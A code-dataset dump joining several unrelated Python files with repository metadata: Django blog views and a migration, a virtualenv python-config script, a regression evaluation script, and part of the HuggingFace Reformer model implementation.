from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from django.utils.text import slugify
from django.db.models import Q
def post_index(request):
post_list = Post.objects.all()
query = request.GET.get('q')
if query:
post_list = post_list.filter( Q(title__icontains=query) |
Q(content__icontains=query) |
Q(user__first_name__icontains=query) |
Q(user__last_name__icontains=query)
).distinct()
paginator = Paginator(post_list, 5)
page = request.GET.get('page')
try:
posts = paginator.page(page)
except PageNotAnInteger:
# If page is not an integer, deliver first page.
posts = paginator.page(1)
except EmptyPage:
# If page is out of range (e.g. 9999), deliver last page of results.
posts = paginator.page(paginator.num_pages)
context = {
'posts' : posts
}
return render(request, 'post/index.html', context)
def post_create(request):
if not request.user.is_authenticated():
messages.error(request, "Bu islem icin yetkiniz yok !")
return post_index(request)
#if request.method=="POST":
# print (request.POST)
#title = request.POST.get('title') Bu yontem uygulanabilir fakat tavsiye edilmez
#content = request.POST.get('content')
#Post.objects.create(title=title, content=content)
#if request.method == 'POST':
# #post olusturma islemi yapilmali
# form = PostForm(request.POST)
# if form.is_valid():
# form.save()
#else:
# #sadece create sayfasina yonlendirme yapilacak
# form = PostForm()
form = PostForm(request.POST or None, request.FILES or None)
if form.is_valid():
post = form.save(commit=False)
post.user = request.user
post.save()
messages.success(request, "Post basarili bir sekilde olusturuldu !")
return HttpResponseRedirect(post.get_absolute_url())
context = {
'form': form
}
return render(request, 'post/create.html', context)
def post_delete(request, slug):
if not request.user.is_authenticated():
messages.error(request, "Bu islem icin yetkiniz yok !")
return post_index(request)
post = get_object_or_404(Post, slug=slug)
post.delete()
messages.success(request, 'Post basarili bir sekilde silindi.')
return redirect('post:index')
def post_update(request, slug):
if not request.user.is_authenticated():
messages.error(request, "Bu islem icin yetkiniz yok !")
return post_index(request)
post = get_object_or_404(Post, slug=slug)
form = PostForm(request.POST or None, request.FILES or None, instance=post)
if form.is_valid():
post = form.save()
messages.success(request, "Post basarili bir sekilde guncellendi !")
return HttpResponseRedirect(post.get_absolute_url())
context = {
'form': form
}
return render(request, 'post/create.html', context)
def post_detail(request, slug):
post = get_object_or_404(Post, slug = slug)
form = CommentForm(request.POST or None)
if form.is_valid():
comment = form.save(commit=False)
comment.post = post
comment.save()
messages.success(request, "Yorum basarili bir sekilde eklendi !")
return HttpResponseRedirect(post.get_absolute_url())
context = {
'post': post,
'form': form,
}
return render(request, 'post/detail.html', context)
| [
"bilal.kocoglu@outlook.com.tr"
] | bilal.kocoglu@outlook.com.tr |
024b9ada66b4ee856c4d8280dcc378ff861efede | 0d53ed17c625bf2c0293cad39fafc2edfa089b2a | /main_app/migrations/0002_piece_user.py | 6378be263835cfe24e68ec79c12e8d8cbd26ce1a | [] | no_license | aaalexandriaaa/sforzando | 0fae6b1ca62b94348fdd8b9e63f2cdb65bbbe9d6 | 17c3494da7458080f19761c5d2cfe55ff97edbe8 | refs/heads/main | 2023-08-04T23:54:01.416602 | 2020-10-16T14:26:08 | 2020-10-16T14:26:08 | 302,711,668 | 0 | 0 | null | 2021-09-22T19:36:59 | 2020-10-09T17:35:53 | Python | UTF-8 | Python | false | false | 598 | py | # Generated by Django 3.1.2 on 2020-10-11 21:26
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('main_app', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='piece',
name='user',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to='auth.user'),
preserve_default=False,
),
]
| [
"67809768+aaalexandriaaa@users.noreply.github.com"
] | 67809768+aaalexandriaaa@users.noreply.github.com |
c47cbf1c998f0c06d74faf1cdd1bc8ef5fc26fcf | f46fcb4f1a1eba8e18f0aeecc858f2f9da8222f0 | /venv/bin/python-config | aa1a21e7d179ec6ef46a96533d16d37f040a3065 | [
"MIT"
] | permissive | miket430/DjangoChannels | ba3d362eeee510cf8a4acab60b460b7e8cdbcac4 | bd772ce29fc3ead2b3286a86374b37729a6b6577 | refs/heads/master | 2021-01-19T15:16:44.337613 | 2017-04-15T21:24:30 | 2017-04-15T21:24:30 | 88,209,231 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,371 | #!/home/mike/Projects/webRTC/DjangoChannels/mysite/venv/bin/python
import sys
import getopt
import sysconfig
valid_opts = ['prefix', 'exec-prefix', 'includes', 'libs', 'cflags',
'ldflags', 'help']
if sys.version_info >= (3, 2):
valid_opts.insert(-1, 'extension-suffix')
valid_opts.append('abiflags')
if sys.version_info >= (3, 3):
valid_opts.append('configdir')
def exit_with_usage(code=1):
sys.stderr.write("Usage: {0} [{1}]\n".format(
sys.argv[0], '|'.join('--'+opt for opt in valid_opts)))
sys.exit(code)
try:
opts, args = getopt.getopt(sys.argv[1:], '', valid_opts)
except getopt.error:
exit_with_usage()
if not opts:
exit_with_usage()
pyver = sysconfig.get_config_var('VERSION')
getvar = sysconfig.get_config_var
opt_flags = [flag for (flag, val) in opts]
if '--help' in opt_flags:
exit_with_usage(code=0)
for opt in opt_flags:
if opt == '--prefix':
print(sysconfig.get_config_var('prefix'))
elif opt == '--exec-prefix':
print(sysconfig.get_config_var('exec_prefix'))
elif opt in ('--includes', '--cflags'):
flags = ['-I' + sysconfig.get_path('include'),
'-I' + sysconfig.get_path('platinclude')]
if opt == '--cflags':
flags.extend(getvar('CFLAGS').split())
print(' '.join(flags))
elif opt in ('--libs', '--ldflags'):
abiflags = getattr(sys, 'abiflags', '')
libs = ['-lpython' + pyver + abiflags]
libs += getvar('LIBS').split()
libs += getvar('SYSLIBS').split()
# add the prefix/lib/pythonX.Y/config dir, but only if there is no
# shared library in prefix/lib/.
if opt == '--ldflags':
if not getvar('Py_ENABLE_SHARED'):
libs.insert(0, '-L' + getvar('LIBPL'))
if not getvar('PYTHONFRAMEWORK'):
libs.extend(getvar('LINKFORSHARED').split())
print(' '.join(libs))
elif opt == '--extension-suffix':
ext_suffix = sysconfig.get_config_var('EXT_SUFFIX')
if ext_suffix is None:
ext_suffix = sysconfig.get_config_var('SO')
print(ext_suffix)
elif opt == '--abiflags':
if not getattr(sys, 'abiflags', None):
exit_with_usage()
print(sys.abiflags)
elif opt == '--configdir':
print(sysconfig.get_config_var('LIBPL'))
| [
"280749941@qq.com"
] | 280749941@qq.com | |
474938eddcd278b842c02f4bc13beab9969ae5d4 | cbf448f9fa287b38a6b175040141e9ee445cfcd1 | /DNN_3L/evaluation_matrics.py | cbb95bef1984a401aac76d2f267d039a67d8c78a | [] | no_license | rnaimehaom/SST-Result | 271c115d6ab1f14265169d98f604d4a63c71184e | 829029b060010b2928032b3d6728c660b538b5cf | refs/heads/main | 2023-03-27T23:17:53.935109 | 2021-04-09T02:49:58 | 2021-04-09T02:49:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,284 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Nov 2 15:39:34 2020
@author: tanzheng
"""
import pickle
import numpy as np
with open('DNN_3L_SST_predict.pkl', 'rb') as f:
MT_predict_result = pickle.load(f)
f.close()
first_pred_out_y, second_pred_out_y, out_prop_y, tasks = MT_predict_result
No_samples = out_prop_y.shape[0]
np_fir_pred_out_y = np.empty(shape=(No_samples, 0))
np_sec_pred_out_y = np.empty(shape=(No_samples, 0))
for i in range(len(first_pred_out_y)):
np_fir_pred_out_y = np.hstack((np_fir_pred_out_y, first_pred_out_y[i]))
np_sec_pred_out_y = np.hstack((np_sec_pred_out_y, second_pred_out_y[i]))
# target RRMSE
# single target
single_task_RRMSE = []
for i in range(len(tasks)):
temp_ST_RRMSE = sum(np.square(out_prop_y[:,i]-np_fir_pred_out_y[:,i])) / sum(np.square(out_prop_y[:,i]-np.mean(out_prop_y[:,i])))
temp_ST_RRMSE = np.sqrt(temp_ST_RRMSE)
single_task_RRMSE.append(temp_ST_RRMSE)
# multi target
multi_task_RRMSE = []
for i in range(len(tasks)):
temp_MT_RRMSE = sum(np.square(out_prop_y[:,i]-np_sec_pred_out_y[:,i])) / sum(np.square(out_prop_y[:,i]-np.mean(out_prop_y[:,i])))
temp_MT_RRMSE = np.sqrt(temp_MT_RRMSE)
multi_task_RRMSE.append(temp_MT_RRMSE)
| [
"noreply@github.com"
] | rnaimehaom.noreply@github.com |
db30ff6125e8ba725f70fa409f394ad7acaaeaff | 570e773112f03048fc4080a066f1ab8bdd87f288 | /reverse.py | f02f982753f3171ed326e5818b91db0fb0e03244 | [] | no_license | shuvendra4228/learn-python | c0da1e0ea7188a80d97b39b933e4278f8321db10 | c61368db0064455104b13f1d6d23df24a64e8b61 | refs/heads/master | 2021-09-04T02:25:47.969362 | 2018-01-14T16:43:42 | 2018-01-14T16:43:42 | 115,523,186 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 92 | py | S = input('enter a string:')
S1=''
for i in range (len(S)):
S1+=S[-(i+1)]
print(S1)
| [
"shuvendra4227@gmail.com"
] | shuvendra4227@gmail.com |
9d9c04e3d472a5fab525b52426f395ff9458ce80 | 3a9e81f9a154aa53db2b62b84e0218e4b1dccbac | /src/transformers/modeling_reformer.py | 6049dc3ed0863b49c3bd71fd51cdf48eeaee2157 | [
"Apache-2.0"
] | permissive | toriving/transformers | c3d5b892c367bfbd857e41a50cd839b03b7ce90b | 2f2aa0c89cab9a77560e6845578f917a61081c67 | refs/heads/master | 2020-08-10T10:27:10.610417 | 2020-08-06T15:47:32 | 2020-08-06T15:47:32 | 214,324,448 | 0 | 0 | Apache-2.0 | 2019-10-11T02:18:03 | 2019-10-11T02:18:03 | null | UTF-8 | Python | false | false | 109,637 | py | # coding=utf-8
# Copyright 2020 The Trax Authors and The HuggingFace Inc. team.
# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""PyTorch REFORMER model. """
import logging
import sys
from collections import namedtuple
from dataclasses import dataclass
from functools import reduce
from operator import mul
from typing import List, Optional, Tuple
import numpy as np
import torch
from torch import nn
from torch.autograd.function import Function
from torch.nn import CrossEntropyLoss, MSELoss
from .activations import gelu, gelu_fast, gelu_new, swish
from .configuration_reformer import ReformerConfig
from .file_utils import (
DUMMY_INPUTS,
DUMMY_MASK,
ModelOutput,
add_code_sample_docstrings,
add_start_docstrings,
add_start_docstrings_to_callable,
)
from .modeling_outputs import CausalLMOutput, MaskedLMOutput, QuestionAnsweringModelOutput, SequenceClassifierOutput
from .modeling_utils import PreTrainedModel, apply_chunking_to_forward
logger = logging.getLogger(__name__)
_CONFIG_FOR_DOC = "ReformerConfig"
_TOKENIZER_FOR_DOC = "ReformerTokenizer"
REFORMER_PRETRAINED_MODEL_ARCHIVE_LIST = [
"google/reformer-crime-and-punishment",
"google/reformer-enwik8",
# See all Reformer models at https://huggingface.co/models?filter=reformer
]
def mish(x):
return x * torch.tanh(nn.functional.softplus(x))
ACT2FN = {
"gelu": gelu,
"relu": torch.nn.functional.relu,
"swish": swish,
"gelu_new": gelu_new,
"gelu_fast": gelu_fast,
"mish": mish,
}
# Define named tuples for nn.Modules here
LSHSelfAttentionOutput = namedtuple("LSHSelfAttentionOutput", ["hidden_states", "attention_probs", "buckets"])
LocalSelfAttentionOutput = namedtuple("LocalSelfAttentionOutput", ["hidden_states", "attention_probs"])
AttentionOutput = namedtuple("AttentionOutput", ["hidden_states", "attention_probs", "buckets"])
ReformerOutput = namedtuple("ReformerOutput", ["hidden_states", "attn_output", "attention_probs", "buckets"])
ReformerBackwardOutput = namedtuple(
"ReformerBackwardOutput", ["attn_output", "hidden_states", "grad_attn_output", "grad_hidden_states"]
)
ReformerEncoderOutput = namedtuple(
"ReformerEncoderOutput", ["hidden_states", "all_hidden_states", "all_attentions", "past_buckets_states"],
)
def _stable_argsort(vector, dim):
# this function scales the vector so that torch.argsort is stable.
# torch.argsort is not stable on its own
scale_offset = torch.arange(vector.shape[dim], device=vector.device).view(1, 1, -1)
scale_offset = scale_offset.expand(vector.shape)
scaled_vector = vector.shape[dim] * vector + (scale_offset % vector.shape[dim])
return torch.argsort(scaled_vector, dim=dim)
def _get_least_common_mult_chunk_len(config):
attn_types = config.attn_layers
attn_types_set = set(attn_types)
if len(attn_types_set) == 1 and attn_types[0] == "lsh":
return config.lsh_attn_chunk_length
elif len(attn_types_set) == 1 and attn_types[0] == "local":
return config.local_attn_chunk_length
elif len(attn_types_set) == 2 and attn_types_set == set(["lsh", "local"]):
return np.lcm(config.lsh_attn_chunk_length, config.local_attn_chunk_length)
else:
raise NotImplementedError(
"Only attn layer types 'lsh' and 'local' exist, but `config.attn_layers`: {}. Select attn layer types from ['lsh', 'local'] only.".format(
config.attn_layers
)
)
def _get_min_chunk_len(config):
attn_types = config.attn_layers
attn_types_set = set(attn_types)
if len(attn_types_set) == 1 and attn_types[0] == "lsh":
return config.lsh_attn_chunk_length
elif len(attn_types_set) == 1 and attn_types[0] == "local":
return config.local_attn_chunk_length
elif len(attn_types_set) == 2 and attn_types_set == set(["lsh", "local"]):
return min(config.lsh_attn_chunk_length, config.local_attn_chunk_length)
else:
raise NotImplementedError(
"Only attn layer types 'lsh' and 'local' exist, but `config.attn_layers`: {}. Select attn layer types from ['lsh', 'local'] only.".format(
config.attn_layers
)
)
class AxialPositionEmbeddings(nn.Module):
"""Constructs axial position embeddings. Useful for very long input
sequences to save memory and time.
"""
def __init__(self, config):
super().__init__()
self.axial_pos_shape = config.axial_pos_shape
self.axial_pos_embds_dim = config.axial_pos_embds_dim
self.dropout = config.hidden_dropout_prob
self.least_common_mult_chunk_length = _get_least_common_mult_chunk_len(config)
self.weights = nn.ParameterList()
assert (
sum(self.axial_pos_embds_dim) == config.hidden_size
), "Make sure that config.axial_pos_embds factors: {} sum to config.hidden_size: {}".format(
self.axial_pos_embds_dim, config.hidden_size
)
# create weights
for axis, axial_pos_embd_dim in enumerate(self.axial_pos_embds_dim):
# create expanded shapes
ax_shape = [1] * len(self.axial_pos_shape)
ax_shape[axis] = self.axial_pos_shape[axis]
ax_shape = tuple(ax_shape) + (axial_pos_embd_dim,)
# create tensor and init
self.weights.append(nn.Parameter(torch.ones(ax_shape, dtype=torch.float32)))
def forward(self, position_ids):
# broadcast weights to correct shape
batch_size = position_ids.shape[0]
sequence_length = position_ids.shape[1]
broadcasted_weights = [
weight.expand((batch_size,) + self.axial_pos_shape + weight.shape[-1:]) for weight in self.weights
]
if self.training is True:
assert (
reduce(mul, self.axial_pos_shape) == sequence_length
), "If training, make sure that config.axial_pos_shape factors: {} multiply to sequence length. Got prod({}) != sequence_length: {}. You might want to consider padding your sequence length to {} or changing config.axial_pos_shape.".format(
self.axial_pos_shape, self.axial_pos_shape, sequence_length, reduce(mul, self.axial_pos_shape)
)
if self.dropout > 0:
weights = torch.cat(broadcasted_weights, dim=-1)
# permute weights so that 2D correctly drops dims 1 and 2
transposed_weights = weights.transpose(2, 1)
# drop entire matrix of last two dims (prev dims 1 and 2)
dropped_transposed_weights = nn.functional.dropout2d(
transposed_weights, p=self.dropout, training=self.training
)
dropped_weights = dropped_transposed_weights.transpose(2, 1)
position_encodings = torch.reshape(dropped_weights, (batch_size, sequence_length, -1))
else:
position_encodings = torch.cat(
[torch.reshape(weight, (batch_size, sequence_length, -1)) for weight in broadcasted_weights],
dim=-1,
)
else:
assert (
reduce(mul, self.axial_pos_shape) >= sequence_length
), "Make sure that config.axial_pos_shape factors: {} multiply at least to max(sequence_length, least_common_mult_chunk_length): max({}, {})".format(
self.axial_pos_shape, sequence_length, self.least_common_mult_chunk_length,
)
# compute how many columns are needed
max_position_id = position_ids.max().item()
required_pos_encodings_columns = -(-(max_position_id + 1) // self.axial_pos_shape[1])
# cut to columns that are needed
position_encodings = torch.cat(
[weight[:, :required_pos_encodings_columns] for weight in broadcasted_weights], dim=-1
)
position_encodings = torch.reshape(position_encodings, (batch_size, -1, position_encodings.shape[-1]))
# select correct position encodings
position_encodings = torch.cat(
[
torch.index_select(position_encodings[i], 0, position_ids[i]).unsqueeze(0)
for i in range(batch_size)
],
dim=0,
)
return position_encodings
class PositionEmbeddings(nn.Module):
"""Constructs conventional position embeddings of shape `[max_pos_embeddings, hidden_size]`.
"""
def __init__(self, config):
super().__init__()
self.dropout = config.hidden_dropout_prob
self.embedding = nn.Embedding(config.max_position_embeddings, config.hidden_size)
def forward(self, position_ids):
position_embeddings = self.embedding(position_ids)
position_embeddings = nn.functional.dropout(position_embeddings, p=self.dropout, training=self.training)
return position_embeddings
class ReformerEmbeddings(nn.Module):
"""Construct the embeddings from word, position and token_type embeddings.
"""
def __init__(self, config):
super().__init__()
self.max_position_embeddings = config.max_position_embeddings
self.dropout = config.hidden_dropout_prob
self.word_embeddings = nn.Embedding(config.vocab_size, config.hidden_size)
self.position_embeddings = (
AxialPositionEmbeddings(config) if config.axial_pos_embds else PositionEmbeddings(config)
)
def forward(self, input_ids=None, position_ids=None, inputs_embeds=None, start_idx_pos_encodings=0):
if input_ids is not None:
input_shape = input_ids.size()
device = input_ids.device
else:
input_shape = inputs_embeds.size()[:-1]
device = inputs_embeds.device
seq_length = input_shape[1]
if position_ids is None:
position_ids = torch.arange(
start_idx_pos_encodings, start_idx_pos_encodings + seq_length, dtype=torch.long, device=device
)
position_ids = position_ids.unsqueeze(0).expand(input_shape)
if inputs_embeds is None:
inputs_embeds = self.word_embeddings(input_ids)
assert (
position_ids.shape[-1] <= self.max_position_embeddings
), "Sequence Length: {} has to be larger equal than config.max_position_embeddings: {}".format(
position_ids.shape[-1], self.max_position_embeddings
)
# dropout
embeddings = nn.functional.dropout(inputs_embeds, p=self.dropout, training=self.training)
# add positional embeddings
position_embeddings = self.position_embeddings(position_ids)
embeddings = embeddings + position_embeddings
return embeddings
class EfficientAttentionMixin:
"""
A few utilities for nn.Modules in Reformer, to be used as a mixin.
"""
def _look_adjacent(self, vectors, num_chunks_before, num_chunks_after):
""" Used to implement attention between consecutive chunks.
Args:
vectors: array of shape [batch_size, num_attention_heads, n_chunks, chunk_len, ...]
num_chunks_before: chunks before current chunk to include in attention
num_chunks_after: chunks after current chunk to include in attention
Returns:
tensor of shape [num_chunks, N * chunk_length, ...], where
N = (1 + num_chunks_before + num_chunks_after).
"""
if num_chunks_before == 0 and num_chunks_after == 0:
return vectors
slices = []
for i in range(-num_chunks_before, num_chunks_after + 1):
if i == 0:
slices.append(vectors)
else:
slices.append(torch.cat([vectors[:, :, i:, ...], vectors[:, :, :i, ...]], dim=2))
return torch.cat(slices, dim=3)
def _split_hidden_size_dim(self, x, num_attn_heads, attn_head_size):
"""
splits hidden_size dim into attn_head_size and num_attn_heads
"""
new_x_shape = x.size()[:-1] + (num_attn_heads, attn_head_size)
x = x.view(*new_x_shape)
return x.transpose(2, 1)
def _merge_hidden_size_dims(self, x, num_attn_heads, attn_head_size):
"""
merges attn_head_size dim and num_attn_heads dim into hidden_size
"""
x = x.permute(0, 2, 1, 3)
return torch.reshape(x, (x.size()[0], -1, num_attn_heads * attn_head_size))
def _split_seq_length_dim_to(self, vectors, dim_factor_1, dim_factor_2, num_attn_heads, attn_head_size=None):
"""
splits sequence length dim of vectors into `dim_factor_1` and `dim_factor_2` dims
"""
batch_size = vectors.shape[0]
split_dim_shape = (batch_size, num_attn_heads, dim_factor_1, dim_factor_2)
if len(vectors.shape) == 4:
return torch.reshape(vectors, split_dim_shape + (attn_head_size,))
elif len(vectors.shape) == 3:
return torch.reshape(vectors, split_dim_shape)
else:
raise ValueError("Input vector rank should be one of [3, 4], but is: {}".format(len(vectors.shape)))
class LSHSelfAttention(nn.Module, EfficientAttentionMixin):
def __init__(self, config):
super().__init__()
self.config = config
self.chunk_length = config.lsh_attn_chunk_length
self.num_hashes = config.num_hashes
self.num_buckets = config.num_buckets
self.num_chunks_before = config.lsh_num_chunks_before
self.num_chunks_after = config.lsh_num_chunks_after
self.hash_seed = config.hash_seed
self.is_decoder = config.is_decoder
self.max_position_embeddings = config.max_position_embeddings
self.dropout = config.lsh_attention_probs_dropout_prob
self.num_attention_heads = config.num_attention_heads
self.attention_head_size = config.attention_head_size
self.all_head_size = self.num_attention_heads * self.attention_head_size
self.hidden_size = config.hidden_size
# projection matrices
self.query_key = nn.Linear(self.hidden_size, self.all_head_size, bias=False)
self.value = nn.Linear(self.hidden_size, self.all_head_size, bias=False)
# save mask value here. Need fp32 and fp16 mask values
self.register_buffer("self_mask_value_float16", torch.tensor(-1e3))
self.register_buffer("self_mask_value_float32", torch.tensor(-1e5))
self.register_buffer("mask_value_float16", torch.tensor(-1e4))
self.register_buffer("mask_value_float32", torch.tensor(-1e9))
def forward(
self,
hidden_states,
attention_mask=None,
head_mask=None,
num_hashes=None,
buckets=None,
past_buckets_states=None,
use_cache=False,
output_attentions=False,
**kwargs
):
sequence_length = hidden_states.shape[1]
batch_size = hidden_states.shape[0]
# num hashes can optionally be overwritten by user
num_hashes = num_hashes if num_hashes is not None else self.num_hashes
do_cached_attention = use_cache and past_buckets_states[1] is not None
# check if cache shall be used and that hidden states are already cached
if do_cached_attention:
assert (
sequence_length == 1
), f"At the moment, auto-regressive language generation is only possible one word at a time. Make sure that input sequence length {sequence_length} equals 1, when `past_buckets_states` is passed."
past_buckets = past_buckets_states[0]
past_states = past_buckets_states[1]
# get query vector
query_vectors = self.query_key(hidden_states)
query_vectors = self._split_hidden_size_dim(
query_vectors, self.num_attention_heads, self.attention_head_size
)
if past_buckets is not None:
key_value_hidden_states, sorted_bucket_idx, buckets = self._get_relevant_hid_states_and_buckets(
query_vectors=query_vectors,
attention_mask=attention_mask,
num_hashes=num_hashes,
hidden_states=hidden_states,
past_states=past_states,
past_buckets=past_buckets,
)
query_key_vectors = self._query_per_attn_head(key_value_hidden_states)
value_vectors = self._value_per_attn_head(key_value_hidden_states)
# split key & value vectors by num hashes to apply
# self attention on each separately
query_key_vectors = self._split_seq_length_dim_to(
query_key_vectors, num_hashes, -1, self.num_attention_heads, self.attention_head_size,
)
value_vectors = self._split_seq_length_dim_to(
value_vectors, num_hashes, -1, self.num_attention_heads, self.attention_head_size,
)
# repeat query vectors across hash dimension
query_vectors = query_vectors.unsqueeze(2).repeat(1, 1, num_hashes, 1, 1)
else:
key_value_hidden_states = torch.cat([past_states, hidden_states], dim=1)
query_key_vectors = self.query_key(key_value_hidden_states)
value_vectors = self.value(key_value_hidden_states)
else:
# project hidden_states to query_key and value
query_vectors = None
query_key_vectors = self.query_key(hidden_states)
value_vectors = self.value(hidden_states)
# if query key is not already split
if not do_cached_attention or past_buckets is None:
query_key_vectors = self._split_hidden_size_dim(
query_key_vectors, self.num_attention_heads, self.attention_head_size
)
value_vectors = self._split_hidden_size_dim(
value_vectors, self.num_attention_heads, self.attention_head_size
)
# cache buckets for next incremental decoding
if do_cached_attention and past_buckets is None and key_value_hidden_states.shape[1] >= self.chunk_length:
buckets = self._hash_vectors(query_key_vectors, num_hashes, attention_mask)
# free memory
del hidden_states
assert (
query_key_vectors.shape[-1] == self.attention_head_size
), "last dim of query_key_vectors is {} but should be {}.".format(
query_key_vectors.shape[-1], self.attention_head_size
)
assert (
value_vectors.shape[-1] == self.attention_head_size
), "last dim of value_vectors is {} but should be {}.".format(
value_vectors.shape[-1], self.attention_head_size
)
do_standard_self_attention = (sequence_length <= self.chunk_length) or (
use_cache and past_buckets_states[1] is not None
)
# LSH attention only makes sense if chunked attention should be performed
if not do_standard_self_attention:
# set `num_buckets` on the fly, recommended way to do it
if self.num_buckets is None:
self._set_num_buckets(sequence_length)
# use cached buckets for backprop only
if buckets is None:
# hash query key vectors into buckets
buckets = self._hash_vectors(query_key_vectors, num_hashes, attention_mask)
else:
# make sure buckets has correct shape for LSH attention
buckets = buckets.view(batch_size, self.num_attention_heads, num_hashes * sequence_length)
assert (
int(buckets.shape[-1]) == num_hashes * sequence_length
), "last dim of buckets is {}, but should be {}".format(buckets.shape[-1], num_hashes * sequence_length)
sorted_bucket_idx, undo_sorted_bucket_idx = self._get_sorted_bucket_idx_and_undo_sorted_bucket_idx(
sequence_length, buckets, num_hashes
)
# make sure bucket idx is not longer then sequence length
sorted_bucket_idx_per_hash = sorted_bucket_idx % sequence_length
# cluster query key value vectors according to hashed buckets
query_key_vectors = self._gather_by_expansion(query_key_vectors, sorted_bucket_idx_per_hash, num_hashes)
value_vectors = self._gather_by_expansion(value_vectors, sorted_bucket_idx_per_hash, num_hashes)
query_key_vectors = self._split_seq_length_dim_to(
query_key_vectors, -1, self.chunk_length, self.num_attention_heads, self.attention_head_size,
)
value_vectors = self._split_seq_length_dim_to(
value_vectors, -1, self.chunk_length, self.num_attention_heads, self.attention_head_size,
)
if self.chunk_length is None:
assert (
self.num_chunks_before == 0 and self.num_chunks_after == 0
), "If `config.chunk_length` is `None`, make sure `config.num_chunks_after` and `config.num_chunks_before` are set to 0."
elif do_cached_attention and past_buckets is not None:
# use max sequence length
sorted_bucket_idx_per_hash = sorted_bucket_idx
else:
# get sequence length indices
sorted_bucket_idx_per_hash = torch.arange(sequence_length, device=query_key_vectors.device).repeat(
batch_size, self.num_attention_heads, 1
)
# scale key vectors
key_vectors = self._len_and_dim_norm(query_key_vectors)
# set query_vectors to query key vectors if LSH self attention
query_vectors = query_vectors if query_vectors is not None else query_key_vectors
# free memory
del query_key_vectors
# get attention probs
out_vectors, logits, attention_probs = self._attend(
query_vectors=query_vectors,
key_vectors=key_vectors,
value_vectors=value_vectors,
sorted_bucket_idx_per_hash=sorted_bucket_idx_per_hash,
attention_mask=attention_mask,
head_mask=head_mask,
do_standard_self_attention=do_standard_self_attention,
do_cached_attention=do_cached_attention,
)
# free memory
del key_vectors, value_vectors
# re-order out_vectors and logits
if not do_standard_self_attention:
# sort clusters back to correct ordering
out_vectors, logits = ReverseSort.apply(out_vectors, logits, sorted_bucket_idx, undo_sorted_bucket_idx)
if not do_standard_self_attention or (do_cached_attention and past_buckets is not None):
# sum up all hash rounds
if num_hashes > 1:
out_vectors = self._split_seq_length_dim_to(
out_vectors, num_hashes, sequence_length, self.num_attention_heads, self.attention_head_size,
)
logits = self._split_seq_length_dim_to(
logits, num_hashes, sequence_length, self.num_attention_heads, self.attention_head_size,
).unsqueeze(-1)
probs_vectors = torch.exp(logits - torch.logsumexp(logits, dim=2, keepdim=True))
out_vectors = torch.sum(out_vectors * probs_vectors, dim=2)
# free memory
del probs_vectors
# free memory
del logits
assert out_vectors.shape == (
batch_size,
self.num_attention_heads,
sequence_length,
self.attention_head_size,
), "out_vectors have be of shape `[batch_size, config.num_attention_heads, sequence_length, config.attention_head_size]`."
out_vectors = self._merge_hidden_size_dims(out_vectors, self.num_attention_heads, self.attention_head_size)
if output_attentions is False:
attention_probs = ()
if buckets is not None:
buckets = buckets.view(batch_size, self.num_attention_heads, num_hashes, -1)
return LSHSelfAttentionOutput(hidden_states=out_vectors, attention_probs=attention_probs, buckets=buckets)
def _query_per_attn_head(self, hidden_states):
per_head_query_key = self.query_key.weight.reshape(
self.num_attention_heads, self.attention_head_size, self.hidden_size
).transpose(-2, -1)
# only relevant for inference and no bias => we can use einsum here
query_key_vectors = torch.einsum("balh,ahr->balr", hidden_states, per_head_query_key)
return query_key_vectors
def _value_per_attn_head(self, hidden_states):
per_head_value = self.value.weight.reshape(
self.num_attention_heads, self.attention_head_size, self.hidden_size
).transpose(-2, -1)
# only relevant for inference and no bias => we can use einsum here
value_vectors = torch.einsum("balh,ahr->balr", hidden_states, per_head_value)
return value_vectors
def _hash_vectors(self, vectors, num_hashes, attention_mask, increase_num_buckets=False):
batch_size = vectors.shape[0]
# See https://arxiv.org/pdf/1509.02897.pdf
# We sample a different random rotation for each round of hashing to
# decrease the probability of hash misses.
if isinstance(self.num_buckets, int):
assert (
self.num_buckets % 2 == 0
), "There should be an even number of bucktes, but `self.num_bucktes`: {}".format(self.num_buckets)
rotation_size = self.num_buckets
num_buckets = self.num_buckets
else:
# Factorize the hash if self.num_buckets is a list or tuple
rotation_size, num_buckets = 0, 1
for bucket_factor in self.num_buckets:
assert bucket_factor % 2 == 0, "The number of buckets should be even, but `num_bucket`: {}".format(
bucket_factor
)
rotation_size = rotation_size + bucket_factor
num_buckets = num_buckets * bucket_factor
# remove gradient
vectors = vectors.detach()
if self.hash_seed is not None:
# for determinism
torch.manual_seed(self.hash_seed)
rotations_shape = (self.num_attention_heads, vectors.shape[-1], num_hashes, rotation_size // 2)
# create a random self.attention_head_size x num_hashes x num_buckets/2
random_rotations = torch.randn(rotations_shape, device=vectors.device, dtype=vectors.dtype)
# Output dim: Batch_Size x Num_Attn_Heads x Num_Hashes x Seq_Len x Num_Buckets/2
rotated_vectors = torch.einsum("bmtd,mdhr->bmhtr", vectors, random_rotations)
if isinstance(self.num_buckets, int) or len(self.num_buckets) == 1:
rotated_vectors = torch.cat([rotated_vectors, -rotated_vectors], dim=-1)
buckets = torch.argmax(rotated_vectors, dim=-1)
else:
# Get the buckets for them and combine.
buckets, cur_sum, cur_product = None, 0, 1
for bucket_factor in self.num_buckets:
rotated_vectors_factor = rotated_vectors[..., cur_sum : cur_sum + (bucket_factor // 2)]
cur_sum = cur_sum + bucket_factor // 2
rotated_vectors_factor = torch.cat([rotated_vectors_factor, -rotated_vectors_factor], dim=-1)
if buckets is None:
buckets = torch.argmax(rotated_vectors_factor, dim=-1)
else:
buckets = buckets + (cur_product * torch.argmax(rotated_vectors_factor, dim=-1))
cur_product = cur_product * bucket_factor
